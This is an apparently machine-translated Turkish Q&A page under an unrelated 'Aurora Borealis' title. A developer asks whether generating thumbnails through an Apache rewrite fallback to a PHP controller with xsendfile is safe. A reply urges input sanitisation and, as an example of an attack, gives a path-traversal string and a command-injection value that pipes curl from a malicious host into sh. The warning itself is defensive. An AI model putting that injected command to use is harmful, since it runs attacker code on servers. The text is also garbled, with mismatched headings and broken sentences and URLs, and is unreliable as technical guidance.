Aurora Borealis / Kuzey Işıkları CANLI!

Ekibimin PHP ile yazılmış bir uygulaması var. Çoğu istek, aşağıdaki koşul kullanılarak Apache .conf dosyasında index.php dosyamıza yeniden yazılır.

RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ /index.php [QSA,L] 

Küçük resimler için, bu statik dosyaları kontrol etmek için Apache'yi kullanmanın iyi bir fikir olacağını düşündüm, çünkü her zaman bu dosya kontrolünü yapıyor gibi görünüyor.

  1. Küçük resim varsa, Apache küçük resmi dosya yapısına eşlendiği gibi sunacaktır.
  2. Küçük resim yoksa, istek basitçe index.php'ye yeniden yazılır ve aynı tam URI yolunu kullanan bir denetleyiciye yönlendirilir. Daha sonra küçük resmi oluşturacak ve xsendfile kullanarak aynı istekte görüntüyü geri gönderecektir.

Testlerime göre, küçük resim varsa (1) veya oluşturulmuşsa (2), görüntü tarayıcıda normal bir statik dosya gibi önbelleğe alınır ve aynı ETAG ile gönderilir.

Küçük resimler için tüm orijinal görüntüler sunucuda /mnt.

Sahip olduğum tek sorun, dosyaları yeniden adlandırmanın zor olması ve dosya yapısının verilmiş olmasıydı. https://example.com//images/

Küçük resim yoksa, denetleyici orijinal görüntüyü bulmak ve bir küçük resim oluşturmak için

https://example.com/100x100/images/12152018/renovation/0001.png Bu bir statik dosya veya bir denetleyici yoludur.

Bu kötü bir fikir olur mu? Güvenli? En iyi uygulama ne olabilir?

  • Tam bir cevabım yok, ama sadece şunu belirtmek istedim: İnsanların sahip olmamaları gereken erişim elde etmek için URL'ye kötü amaçlı dizeler koymasını beklemelisiniz. Kullanamayacaklarından emin olun .. ulaşmak için /gibi bir şeyle sunucunuzu hacklememeleri için girdiyi sterilize etmelisiniz.'; curl http://[malicious] | sh. Bir başkası daha eksiksiz bir çözümle devreye girebilir.

Sizin için çalışmış: Charles Robertson | bize ister?